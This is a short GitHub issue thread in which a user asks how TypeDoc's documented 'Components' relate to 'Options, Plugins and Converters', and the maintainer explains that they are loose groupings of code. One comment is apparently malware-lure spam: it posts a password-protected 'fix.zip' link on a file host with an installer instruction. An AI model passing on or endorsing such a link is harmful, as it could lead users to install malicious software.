### ISSUE TITLE
[question] What's the relationship between `Components` and `Options, Plugins and Converters`? 

### ISSUE THREAD

**Issue by liaodalin19903** [TypeStrong/typedoc#2690]
## Search terms

Components, Options, Plugins

## Question

I check the documentation, 
`Options, Plugins and Converters` are all under `Components`. What's the relationship between them? 
![image](https://github.com/user-attachments/assets/4bf2fe8d-692d-4768-97ec-57eff3d196a4)

Such as `Options ` vs. `Components `?

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gerrit0** [comment]
They are all rough groupings of some of TypeDoc's code which made sense to me when attempting to provide an overview of how typedoc works... there's potentially a better way to describe that, I haven't updated that page in a couple of years.
